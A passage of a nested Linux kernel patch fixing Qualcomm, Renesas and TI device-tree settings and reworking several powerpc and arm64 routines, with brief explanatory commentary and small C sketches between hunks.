++		regulator-min-microvolt = <2800000>;
++		regulator-max-microvolt = <2800000>;
+ 	};
+ 
+ 	l11 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <2950000>;
++		regulator-max-microvolt = <2950000>;
+ 		regulator-allow-set-load;
+ 		regulator-system-load = <200000>;
+ 	};
+ 
+ 	l12 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <1800000>;
++		regulator-max-microvolt = <2950000>;
+ 	};
+ 
+ 	l13 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <3075000>;
++		regulator-max-microvolt = <3075000>;
+ 	};
+ 
+ 	l14 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <1800000>;
++		regulator-max-microvolt = <3300000>;
+ 	};
+ 
+-	/**
+-	 * 1.8v required on LS expansion
+-	 * for mezzanine boards
++	/*
++	 * The 96Boards specification expects a 1.8V power rail on the low-speed
++	 * expansion connector that is able to provide at least 0.18W / 100 mA.
++	 * L15/L16 are connected in parallel to provide 55 mA each. A minimum load
++	 * must be specified to ensure the regulators are not put in LPM where they
++	 * would only provide 5 mA.
+ 	 */
+ 	l15 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <1800000>;
++		regulator-max-microvolt = <1800000>;
++		regulator-system-load = <50000>;
++		regulator-allow-set-load;
+ 		regulator-always-on;
+ 	};
+ 
+ 	l16 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <1800000>;
++		regulator-max-microvolt = <1800000>;
++		regulator-system-load = <50000>;
++		regulator-allow-set-load;
++		regulator-always-on;
+ 	};
+ 
+ 	l17 {
+@@ -548,8 +556,8 @@
+ 	};
+ 
+ 	l18 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <2700000>;
++		regulator-max-microvolt = <2700000>;
+ 	};
+ };
+ 
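
The minimum-load note above is the crux of this hunk: an LDO parked in low-power
mode can source only about 5 mA, so a rail that reads as enabled may still brown
out a 100 mA consumer. The same constraint can be expressed from the consumer
side in C; a minimal sketch, assuming a hypothetical supply name "vdd-ls-exp"
(devm_regulator_get(), regulator_set_load() and regulator_enable() are the
standard consumer API, the rest is illustrative):

#include <linux/device.h>
#include <linux/err.h>
#include <linux/regulator/consumer.h>

/* Declare enough load that the regulator core keeps the LDO in
 * high-power mode, mirroring regulator-system-load in the DT above. */
static int example_enable_ls_rail(struct device *dev)
{
	struct regulator *vdd;
	int ret;

	vdd = devm_regulator_get(dev, "vdd-ls-exp");	/* assumed supply name */
	if (IS_ERR(vdd))
		return PTR_ERR(vdd);

	ret = regulator_set_load(vdd, 50000);	/* 50 mA, as in the DT */
	if (ret)
		return ret;

	return regulator_enable(vdd);
}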
+diff --git a/arch/arm64/boot/dts/qcom/apq8096-ifc6640.dts b/arch/arm64/boot/dts/qcom/apq8096-ifc6640.dts
+index 92f264891d84b..9b20c1a47a186 100644
+--- a/arch/arm64/boot/dts/qcom/apq8096-ifc6640.dts
++++ b/arch/arm64/boot/dts/qcom/apq8096-ifc6640.dts
+@@ -26,7 +26,7 @@
+ 
+ 	v1p05: v1p05-regulator {
+ 		compatible = "regulator-fixed";
+-		reglator-name = "v1p05";
++		regulator-name = "v1p05";
+ 		regulator-always-on;
+ 		regulator-boot-on;
+ 
+@@ -38,7 +38,7 @@
+ 
+ 	v12_poe: v12-poe-regulator {
+ 		compatible = "regulator-fixed";
+-		reglator-name = "v12_poe";
++		regulator-name = "v12_poe";
+ 		regulator-always-on;
+ 		regulator-boot-on;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8916.dtsi b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+index 9743cb270639d..f84b3c1a03c53 100644
+--- a/arch/arm64/boot/dts/qcom/msm8916.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+@@ -1088,7 +1088,7 @@
+ 			};
+ 		};
+ 
+-		camss: camss@1b00000 {
++		camss: camss@1b0ac00 {
+ 			compatible = "qcom,msm8916-camss";
+ 			reg = <0x01b0ac00 0x200>,
+ 				<0x01b00030 0x4>,
+@@ -1480,7 +1480,7 @@
+ 			#sound-dai-cells = <1>;
+ 		};
+ 
+-		sdhc_1: mmc@7824000 {
++		sdhc_1: mmc@7824900 {
+ 			compatible = "qcom,msm8916-sdhci", "qcom,sdhci-msm-v4";
+ 			reg = <0x07824900 0x11c>, <0x07824000 0x800>;
+ 			reg-names = "hc", "core";
+@@ -1498,7 +1498,7 @@
+ 			status = "disabled";
+ 		};
+ 
+-		sdhc_2: mmc@7864000 {
++		sdhc_2: mmc@7864900 {
+ 			compatible = "qcom,msm8916-sdhci", "qcom,sdhci-msm-v4";
+ 			reg = <0x07864900 0x11c>, <0x07864000 0x800>;
+ 			reg-names = "hc", "core";
+diff --git a/arch/arm64/boot/dts/qcom/msm8994.dtsi b/arch/arm64/boot/dts/qcom/msm8994.dtsi
+index 7ed59e698c14d..3c6c2cf99fb9d 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8994.dtsi
+@@ -746,7 +746,7 @@
+ 			reg = <0xfc4ab000 0x4>;
+ 		};
+ 
+-		spmi_bus: spmi@fc4c0000 {
++		spmi_bus: spmi@fc4cf000 {
+ 			compatible = "qcom,spmi-pmic-arb";
+ 			reg = <0xfc4cf000 0x1000>,
+ 			      <0xfc4cb000 0x1000>,
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 9f89100542018..9d6ec59d1cd3a 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -2045,7 +2045,7 @@
+ 			};
+ 		};
+ 
+-		camss: camss@a00000 {
++		camss: camss@a34000 {
+ 			compatible = "qcom,msm8996-camss";
+ 			reg = <0x00a34000 0x1000>,
+ 			      <0x00a00030 0x4>,
+diff --git a/arch/arm64/boot/dts/qcom/pm7250b.dtsi b/arch/arm64/boot/dts/qcom/pm7250b.dtsi
+index 61f7a63451505..694fe912536e8 100644
+--- a/arch/arm64/boot/dts/qcom/pm7250b.dtsi
++++ b/arch/arm64/boot/dts/qcom/pm7250b.dtsi
+@@ -3,6 +3,7 @@
+  * Copyright (C) 2022 Luca Weiss <luca.weiss@fairphone.com>
+  */
+ 
++#include <dt-bindings/iio/qcom,spmi-vadc.h>
+ #include <dt-bindings/interrupt-controller/irq.h>
+ #include <dt-bindings/spmi/spmi.h>
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm630.dtsi b/arch/arm64/boot/dts/qcom/sdm630.dtsi
+index e119060ac56cb..2430549265d3f 100644
+--- a/arch/arm64/boot/dts/qcom/sdm630.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm630.dtsi
+@@ -1902,7 +1902,7 @@
+ 			};
+ 		};
+ 
+-		camss: camss@ca00000 {
++		camss: camss@ca00020 {
+ 			compatible = "qcom,sdm660-camss";
+ 			reg = <0x0ca00020 0x10>,
+ 			      <0x0ca30000 0x100>,
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+index 74c6832e05985..093b04359ec39 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+@@ -484,6 +484,7 @@
+ 		};
+ 
+ 		rmi4-f12@12 {
++			reg = <0x12>;
+ 			syna,rezero-wait-ms = <0xc8>;
+ 			syna,clip-x-high = <0x438>;
+ 			syna,clip-y-high = <0x870>;
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index a99eda4971010..b7ba70857d0ad 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -4207,7 +4207,7 @@
+ 			#reset-cells = <1>;
+ 		};
+ 
+-		camss: camss@a00000 {
++		camss: camss@acb3000 {
+ 			compatible = "qcom,sdm845-camss";
+ 
+ 			reg = <0 0xacb3000 0 0x1000>,
+@@ -5043,6 +5043,7 @@
+ 					  <SLEEP_TCS   3>,
+ 					  <WAKE_TCS    3>,
+ 					  <CONTROL_TCS 1>;
++			power-domains = <&CLUSTER_PD>;
+ 
+ 			apps_bcm_voter: bcm-voter {
+ 				compatible = "qcom,bcm-voter";
+diff --git a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+index e4769dcfaad7b..390b90a8ddf70 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+@@ -26,9 +26,10 @@
+ 		framebuffer: framebuffer@9c000000 {
+ 			compatible = "simple-framebuffer";
+ 			reg = <0 0x9c000000 0 0x2300000>;
+-			width = <1644>;
+-			height = <3840>;
+-			stride = <(1644 * 4)>;
++			/* pdx203 BL initializes in 2.5k mode, not 4k */
++			width = <1096>;
++			height = <2560>;
++			stride = <(1096 * 4)>;
+ 			format = "a8r8g8b8";
+ 			/*
+ 			 * That's a lot of clocks, but it's necessary due
+diff --git a/arch/arm64/boot/dts/qcom/sm8350.dtsi b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+index ca7c428a741d4..7fd1c3f71c0f8 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+@@ -678,7 +678,7 @@
+ 		};
+ 
+ 		gpi_dma2: dma-controller@800000 {
+-			compatible = "qcom,sm8350-gpi-dma";
++			compatible = "qcom,sm8350-gpi-dma", "qcom,sm6350-gpi-dma";
+ 			reg = <0 0x00800000 0 0x60000>;
+ 			interrupts = <GIC_SPI 588 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 589 IRQ_TYPE_LEVEL_HIGH>,
+@@ -903,8 +903,8 @@
+ 			};
+ 		};
+ 
+-		gpi_dma0: dma-controller@900000 {
+-			compatible = "qcom,sm8350-gpi-dma";
++		gpi_dma0: dma-controller@9800000 {
++			compatible = "qcom,sm8350-gpi-dma", "qcom,sm6350-gpi-dma";
+ 			reg = <0 0x09800000 0 0x60000>;
+ 			interrupts = <GIC_SPI 244 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 245 IRQ_TYPE_LEVEL_HIGH>,
+@@ -1207,7 +1207,7 @@
+ 		};
+ 
+ 		gpi_dma1: dma-controller@a00000 {
+-			compatible = "qcom,sm8350-gpi-dma";
++			compatible = "qcom,sm8350-gpi-dma", "qcom,sm6350-gpi-dma";
+ 			reg = <0 0x00a00000 0 0x60000>;
+ 			interrupts = <GIC_SPI 279 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 280 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi b/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi
+index 408871c2859d1..588b14b66b6fb 100644
+--- a/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi
++++ b/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi
+@@ -393,7 +393,7 @@
+ 	};
+ 
+ 	scif1_pins: scif1 {
+-		groups = "scif1_data_b", "scif1_ctrl";
++		groups = "scif1_data_b";
+ 		function = "scif1";
+ 	};
+ 
+@@ -447,7 +447,6 @@
+ &scif1 {
+ 	pinctrl-0 = <&scif1_pins>;
+ 	pinctrl-names = "default";
+-	uart-has-rtscts;
+ 
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts b/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
+index 50009f963a324..5840063f61293 100644
+--- a/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
++++ b/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
+@@ -83,25 +83,25 @@
+ &wkup_pmx2 {
+ 	mcu_cpsw_pins_default: mcu-cpsw-pins-default {
+ 		pinctrl-single,pins = <
+-			J721E_WKUP_IOPAD(0x0068, PIN_OUTPUT, 0) /* MCU_RGMII1_TX_CTL */
+-			J721E_WKUP_IOPAD(0x006c, PIN_INPUT, 0) /* MCU_RGMII1_RX_CTL */
+-			J721E_WKUP_IOPAD(0x0070, PIN_OUTPUT, 0) /* MCU_RGMII1_TD3 */
+-			J721E_WKUP_IOPAD(0x0074, PIN_OUTPUT, 0) /* MCU_RGMII1_TD2 */
+-			J721E_WKUP_IOPAD(0x0078, PIN_OUTPUT, 0) /* MCU_RGMII1_TD1 */
+-			J721E_WKUP_IOPAD(0x007c, PIN_OUTPUT, 0) /* MCU_RGMII1_TD0 */
+-			J721E_WKUP_IOPAD(0x0088, PIN_INPUT, 0) /* MCU_RGMII1_RD3 */
+-			J721E_WKUP_IOPAD(0x008c, PIN_INPUT, 0) /* MCU_RGMII1_RD2 */
+-			J721E_WKUP_IOPAD(0x0090, PIN_INPUT, 0) /* MCU_RGMII1_RD1 */
+-			J721E_WKUP_IOPAD(0x0094, PIN_INPUT, 0) /* MCU_RGMII1_RD0 */
+-			J721E_WKUP_IOPAD(0x0080, PIN_OUTPUT, 0) /* MCU_RGMII1_TXC */
+-			J721E_WKUP_IOPAD(0x0084, PIN_INPUT, 0) /* MCU_RGMII1_RXC */
++			J721E_WKUP_IOPAD(0x0000, PIN_OUTPUT, 0) /* MCU_RGMII1_TX_CTL */
++			J721E_WKUP_IOPAD(0x0004, PIN_INPUT, 0) /* MCU_RGMII1_RX_CTL */
++			J721E_WKUP_IOPAD(0x0008, PIN_OUTPUT, 0) /* MCU_RGMII1_TD3 */
++			J721E_WKUP_IOPAD(0x000c, PIN_OUTPUT, 0) /* MCU_RGMII1_TD2 */
++			J721E_WKUP_IOPAD(0x0010, PIN_OUTPUT, 0) /* MCU_RGMII1_TD1 */
++			J721E_WKUP_IOPAD(0x0014, PIN_OUTPUT, 0) /* MCU_RGMII1_TD0 */
++			J721E_WKUP_IOPAD(0x0020, PIN_INPUT, 0) /* MCU_RGMII1_RD3 */
++			J721E_WKUP_IOPAD(0x0024, PIN_INPUT, 0) /* MCU_RGMII1_RD2 */
++			J721E_WKUP_IOPAD(0x0028, PIN_INPUT, 0) /* MCU_RGMII1_RD1 */
++			J721E_WKUP_IOPAD(0x002c, PIN_INPUT, 0) /* MCU_RGMII1_RD0 */
++			J721E_WKUP_IOPAD(0x0018, PIN_OUTPUT, 0) /* MCU_RGMII1_TXC */
++			J721E_WKUP_IOPAD(0x001c, PIN_INPUT, 0) /* MCU_RGMII1_RXC */
+ 		>;
+ 	};
+ 
+ 	mcu_mdio_pins_default: mcu-mdio1-pins-default {
+ 		pinctrl-single,pins = <
+-			J721E_WKUP_IOPAD(0x009c, PIN_OUTPUT, 0) /* (L1) MCU_MDIO0_MDC */
+-			J721E_WKUP_IOPAD(0x0098, PIN_INPUT, 0) /* (L4) MCU_MDIO0_MDIO */
++			J721E_WKUP_IOPAD(0x0034, PIN_OUTPUT, 0) /* (L1) MCU_MDIO0_MDC */
++			J721E_WKUP_IOPAD(0x0030, PIN_INPUT, 0) /* (L4) MCU_MDIO0_MDIO */
+ 		>;
+ 	};
+ };
+diff --git a/arch/arm64/include/asm/fpsimdmacros.h b/arch/arm64/include/asm/fpsimdmacros.h
+index 5e0910cf48321..696d247cf8fb0 100644
+--- a/arch/arm64/include/asm/fpsimdmacros.h
++++ b/arch/arm64/include/asm/fpsimdmacros.h
+@@ -294,12 +294,12 @@
+  _for n, 0, 15,	_sve_str_p	\n, \nxbase, \n - 16
+ 		cbz		\save_ffr, 921f
+ 		_sve_rdffr	0
+-		_sve_str_p	0, \nxbase
+-		_sve_ldr_p	0, \nxbase, -16
+ 		b		922f
+ 921:
+-		str		xzr, [x\nxbase]		// Zero out FFR
++		_sve_pfalse	0			// Zero out FFR
+ 922:
++		_sve_str_p	0, \nxbase
++		_sve_ldr_p	0, \nxbase, -16
+ 		mrs		x\nxtmp, fpsr
+ 		str		w\nxtmp, [\xpfpsr]
+ 		mrs		x\nxtmp, fpcr
+diff --git a/arch/powerpc/Kconfig.debug b/arch/powerpc/Kconfig.debug
+index 6aaf8dc60610d..2a54fadbeaf51 100644
+--- a/arch/powerpc/Kconfig.debug
++++ b/arch/powerpc/Kconfig.debug
+@@ -240,7 +240,7 @@ config PPC_EARLY_DEBUG_40x
+ 
+ config PPC_EARLY_DEBUG_CPM
+ 	bool "Early serial debugging for Freescale CPM-based serial ports"
+-	depends on SERIAL_CPM
++	depends on SERIAL_CPM=y
+ 	help
+ 	  Select this to enable early debugging for Freescale chips
+ 	  using a CPM-based serial port.  This assumes that the bootwrapper
+diff --git a/arch/powerpc/boot/dts/turris1x.dts b/arch/powerpc/boot/dts/turris1x.dts
+index e9cda34a140e0..9377055d5565c 100644
+--- a/arch/powerpc/boot/dts/turris1x.dts
++++ b/arch/powerpc/boot/dts/turris1x.dts
+@@ -453,12 +453,12 @@
+ 		 * channel 1 (but only USB 2.0 subset) to USB 2.0 pins on mPCIe
+ 		 * slot 1 (CN5), channels 2 and 3 to connector P600.
+ 		 *
+-		 * P2020 PCIe Root Port uses 1MB of PCIe MEM and xHCI controller
++		 * P2020 PCIe Root Port does not use PCIe MEM and xHCI controller
+ 		 * uses 64kB + 8kB of PCIe MEM. No PCIe IO is used or required.
+-		 * So allocate 2MB of PCIe MEM for this PCIe bus.
++		 * So allocate 128kB of PCIe MEM for this PCIe bus.
+ 		 */
+ 		reg = <0 0xffe08000 0 0x1000>;
+-		ranges = <0x02000000 0x0 0xc0000000 0 0xc0000000 0x0 0x00200000>, /* MEM */
++		ranges = <0x02000000 0x0 0xc0000000 0 0xc0000000 0x0 0x00020000>, /* MEM */
+ 			 <0x01000000 0x0 0x00000000 0 0xffc20000 0x0 0x00010000>; /* IO */
+ 
+ 		pcie@0 {
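
The window arithmetic in the new comment checks out: the xHCI controller needs
a 64 KiB BAR plus an 8 KiB BAR, 0x12000 bytes in total, and assuming the bridge
window is rounded up to a power of two the smallest fit is 0x20000 (128 KiB),
the size now used in the MEM entry of ranges. A throwaway standalone check of
that arithmetic:

#include <stdio.h>

int main(void)
{
	unsigned long need = 0x10000 + 0x2000;	/* 64 KiB + 8 KiB = 0x12000 */
	unsigned long win = 1;

	while (win < need)	/* round up to the next power of two */
		win <<= 1;

	printf("need=%#lx window=%#lx\n", need, win);	/* 0x12000 -> 0x20000 */
	return 0;
}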
+diff --git a/arch/powerpc/kernel/interrupt.c b/arch/powerpc/kernel/interrupt.c
+index 0ec1581619db5..cf770d86c03c6 100644
+--- a/arch/powerpc/kernel/interrupt.c
++++ b/arch/powerpc/kernel/interrupt.c
+@@ -368,7 +368,6 @@ void preempt_schedule_irq(void);
+ 
+ notrace unsigned long interrupt_exit_kernel_prepare(struct pt_regs *regs)
+ {
+-	unsigned long flags;
+ 	unsigned long ret = 0;
+ 	unsigned long kuap;
+ 	bool stack_store = read_thread_flags() & _TIF_EMULATE_STACK_STORE;
+@@ -392,7 +391,7 @@ notrace unsigned long interrupt_exit_kernel_prepare(struct pt_regs *regs)
+ 
+ 	kuap = kuap_get_and_assert_locked();
+ 
+-	local_irq_save(flags);
++	local_irq_disable();
+ 
+ 	if (!arch_irq_disabled_regs(regs)) {
+ 		/* Returning to a kernel context with local irqs enabled. */
+diff --git a/arch/powerpc/kernel/ppc_save_regs.S b/arch/powerpc/kernel/ppc_save_regs.S
+index 2d4d21bb46a97..235ae24284519 100644
+--- a/arch/powerpc/kernel/ppc_save_regs.S
++++ b/arch/powerpc/kernel/ppc_save_regs.S
+@@ -21,60 +21,33 @@
+  * different ABIs, though).
+  */
+ _GLOBAL(ppc_save_regs)
+-	PPC_STL	r0,0*SZL(r3)
++	/* This allows stack frame accessor macros and offsets to be used */
++	subi	r3,r3,STACK_FRAME_OVERHEAD
++	PPC_STL	r0,GPR0(r3)
+ #ifdef CONFIG_PPC32
+-	stmw	r2, 2*SZL(r3)
++	stmw	r2,GPR2(r3)
+ #else
+-	PPC_STL	r2,2*SZL(r3)
+-	PPC_STL	r3,3*SZL(r3)
+-	PPC_STL	r4,4*SZL(r3)
+-	PPC_STL	r5,5*SZL(r3)
+-	PPC_STL	r6,6*SZL(r3)
+-	PPC_STL	r7,7*SZL(r3)
+-	PPC_STL	r8,8*SZL(r3)
+-	PPC_STL	r9,9*SZL(r3)
+-	PPC_STL	r10,10*SZL(r3)
+-	PPC_STL	r11,11*SZL(r3)
+-	PPC_STL	r12,12*SZL(r3)
+-	PPC_STL	r13,13*SZL(r3)
+-	PPC_STL	r14,14*SZL(r3)
+-	PPC_STL	r15,15*SZL(r3)
+-	PPC_STL	r16,16*SZL(r3)
+-	PPC_STL	r17,17*SZL(r3)
+-	PPC_STL	r18,18*SZL(r3)
+-	PPC_STL	r19,19*SZL(r3)
+-	PPC_STL	r20,20*SZL(r3)
+-	PPC_STL	r21,21*SZL(r3)
+-	PPC_STL	r22,22*SZL(r3)
+-	PPC_STL	r23,23*SZL(r3)
+-	PPC_STL	r24,24*SZL(r3)
+-	PPC_STL	r25,25*SZL(r3)
+-	PPC_STL	r26,26*SZL(r3)
+-	PPC_STL	r27,27*SZL(r3)
+-	PPC_STL	r28,28*SZL(r3)
+-	PPC_STL	r29,29*SZL(r3)
+-	PPC_STL	r30,30*SZL(r3)
+-	PPC_STL	r31,31*SZL(r3)
++	SAVE_GPRS(2, 31, r3)
+ 	lbz	r0,PACAIRQSOFTMASK(r13)
+-	PPC_STL	r0,SOFTE-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,SOFTE(r3)
+ #endif
+-	/* go up one stack frame for SP */
+-	PPC_LL	r4,0(r1)
+-	PPC_STL	r4,1*SZL(r3)
++	/* store current SP */
++	PPC_STL	r1,GPR1(r3)
+ 	/* get caller's LR */
++	PPC_LL	r4,0(r1)
+ 	PPC_LL	r0,LRSAVE(r4)
+-	PPC_STL	r0,_LINK-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,_LINK(r3)
+ 	mflr	r0
+-	PPC_STL	r0,_NIP-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,_NIP(r3)
+ 	mfmsr	r0
+-	PPC_STL	r0,_MSR-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,_MSR(r3)
+ 	mfctr	r0
+-	PPC_STL	r0,_CTR-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,_CTR(r3)
+ 	mfxer	r0
+-	PPC_STL	r0,_XER-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,_XER(r3)
+ 	mfcr	r0
+-	PPC_STL	r0,_CCR-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,_CCR(r3)
+ 	li	r0,0
+-	PPC_STL	r0,_TRAP-STACK_FRAME_OVERHEAD(r3)
+-	PPC_STL	r0,ORIG_GPR3-STACK_FRAME_OVERHEAD(r3)
++	PPC_STL	r0,_TRAP(r3)
++	PPC_STL	r0,ORIG_GPR3(r3)
+ 	blr
+diff --git a/arch/powerpc/kernel/signal_32.c b/arch/powerpc/kernel/signal_32.c
+index c114c7f25645c..7a718ed32b277 100644
+--- a/arch/powerpc/kernel/signal_32.c
++++ b/arch/powerpc/kernel/signal_32.c
+@@ -264,8 +264,9 @@ static void prepare_save_user_regs(int ctx_has_vsx_region)
+ #endif
+ }
+ 
+-static int __unsafe_save_user_regs(struct pt_regs *regs, struct mcontext __user *frame,
+-				   struct mcontext __user *tm_frame, int ctx_has_vsx_region)
++static __always_inline int
++__unsafe_save_user_regs(struct pt_regs *regs, struct mcontext __user *frame,
++			struct mcontext __user *tm_frame, int ctx_has_vsx_region)
+ {
+ 	unsigned long msr = regs->msr;
+ 
+@@ -364,8 +365,9 @@ static void prepare_save_tm_user_regs(void)
+ 		current->thread.ckvrsave = mfspr(SPRN_VRSAVE);
+ }
+ 
+-static int save_tm_user_regs_unsafe(struct pt_regs *regs, struct mcontext __user *frame,
+-				    struct mcontext __user *tm_frame, unsigned long msr)
++static __always_inline int
++save_tm_user_regs_unsafe(struct pt_regs *regs, struct mcontext __user *frame,
++			 struct mcontext __user *tm_frame, unsigned long msr)
+ {
+ 	/* Save both sets of general registers */
+ 	unsafe_save_general_regs(&current->thread.ckpt_regs, frame, failed);
+@@ -444,8 +446,9 @@ failed:
+ #else
+ static void prepare_save_tm_user_regs(void) { }
+ 
+-static int save_tm_user_regs_unsafe(struct pt_regs *regs, struct mcontext __user *frame,
+-				    struct mcontext __user *tm_frame, unsigned long msr)
++static __always_inline int
++save_tm_user_regs_unsafe(struct pt_regs *regs, struct mcontext __user *frame,
++			 struct mcontext __user *tm_frame, unsigned long msr)
+ {
+ 	return 0;
+ }
+diff --git a/arch/powerpc/mm/book3s64/radix_pgtable.c b/arch/powerpc/mm/book3s64/radix_pgtable.c
+index 2297aa764ecdb..e8db8c8efe359 100644
+--- a/arch/powerpc/mm/book3s64/radix_pgtable.c
++++ b/arch/powerpc/mm/book3s64/radix_pgtable.c
+@@ -745,9 +745,9 @@ static void free_pud_table(pud_t *pud_start, p4d_t *p4d)
+ }
+ 
+ static void remove_pte_table(pte_t *pte_start, unsigned long addr,
+-			     unsigned long end)
++			     unsigned long end, bool direct)
+ {
+-	unsigned long next;
++	unsigned long next, pages = 0;
+ 	pte_t *pte;
+ 
+ 	pte = pte_start + pte_index(addr);
+@@ -769,13 +769,16 @@ static void remove_pte_table(pte_t *pte_start, unsigned long addr,
+ 		}
+ 
+ 		pte_clear(&init_mm, addr, pte);
++		pages++;
+ 	}
++	if (direct)
++		update_page_count(mmu_virtual_psize, -pages);
+ }
+ 
+ static void __meminit remove_pmd_table(pmd_t *pmd_start, unsigned long addr,
+-			     unsigned long end)
++				       unsigned long end, bool direct)
+ {
+-	unsigned long next;
++	unsigned long next, pages = 0;
+ 	pte_t *pte_base;
+ 	pmd_t *pmd;
+ 
+@@ -793,19 +796,22 @@ static void __meminit remove_pmd_table(pmd_t *pmd_start, unsigned long addr,
+ 				continue;
+ 			}
+ 			pte_clear(&init_mm, addr, (pte_t *)pmd);
++			pages++;
+ 			continue;
+ 		}
+ 
+ 		pte_base = (pte_t *)pmd_page_vaddr(*pmd);
+-		remove_pte_table(pte_base, addr, next);
++		remove_pte_table(pte_base, addr, next, direct);
+ 		free_pte_table(pte_base, pmd);
+ 	}
++	if (direct)
++		update_page_count(MMU_PAGE_2M, -pages);
+ }
+ 
+ static void __meminit remove_pud_table(pud_t *pud_start, unsigned long addr,
+-			     unsigned long end)
++				       unsigned long end, bool direct)
+ {
+-	unsigned long next;
++	unsigned long next, pages = 0;
+ 	pmd_t *pmd_base;
+ 	pud_t *pud;
+ 
+@@ -823,16 +829,20 @@ static void __meminit remove_pud_table(pud_t *pud_start, unsigned long addr,
+ 				continue;
+ 			}
+ 			pte_clear(&init_mm, addr, (pte_t *)pud);
++			pages++;
+ 			continue;
+ 		}
+ 
+ 		pmd_base = pud_pgtable(*pud);
+-		remove_pmd_table(pmd_base, addr, next);
++		remove_pmd_table(pmd_base, addr, next, direct);
+ 		free_pmd_table(pmd_base, pud);
+ 	}
++	if (direct)
++		update_page_count(MMU_PAGE_1G, -pages);
+ }
+ 
+-static void __meminit remove_pagetable(unsigned long start, unsigned long end)
++static void __meminit remove_pagetable(unsigned long start, unsigned long end,
++				       bool direct)
+ {
+ 	unsigned long addr, next;
+ 	pud_t *pud_base;
+@@ -861,7 +871,7 @@ static void __meminit remove_pagetable(unsigned long start, unsigned long end)
+ 		}
+ 
+ 		pud_base = p4d_pgtable(*p4d);
+-		remove_pud_table(pud_base, addr, next);
++		remove_pud_table(pud_base, addr, next, direct);
+ 		free_pud_table(pud_base, p4d);
+ 	}
+ 
+@@ -884,7 +894,7 @@ int __meminit radix__create_section_mapping(unsigned long start,
+ 
+ int __meminit radix__remove_section_mapping(unsigned long start, unsigned long end)
+ {
+-	remove_pagetable(start, end);
++	remove_pagetable(start, end, true);
+ 	return 0;
+ }
+ #endif /* CONFIG_MEMORY_HOTPLUG */
+@@ -920,7 +930,7 @@ int __meminit radix__vmemmap_create_mapping(unsigned long start,
+ #ifdef CONFIG_MEMORY_HOTPLUG
+ void __meminit radix__vmemmap_remove_mapping(unsigned long start, unsigned long page_size)
+ {
+-	remove_pagetable(start, start + page_size);
++	remove_pagetable(start, start + page_size, false);
+ }
+ #endif
+ #endif
+diff --git a/arch/powerpc/mm/init_64.c b/arch/powerpc/mm/init_64.c
+index 05b0d584e50b8..fe1b83020e0df 100644
+--- a/arch/powerpc/mm/init_64.c
++++ b/arch/powerpc/mm/init_64.c
+@@ -189,7 +189,7 @@ static bool altmap_cross_boundary(struct vmem_altmap *altmap, unsigned long star
+ 	unsigned long nr_pfn = page_size / sizeof(struct page);
+ 	unsigned long start_pfn = page_to_pfn((struct page *)start);
+ 
+-	if ((start_pfn + nr_pfn) > altmap->end_pfn)
++	if ((start_pfn + nr_pfn - 1) > altmap->end_pfn)
+ 		return true;
+ 
+ 	if (start_pfn < altmap->base_pfn)
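
The fix reads naturally once altmap->end_pfn is taken as the last usable pfn
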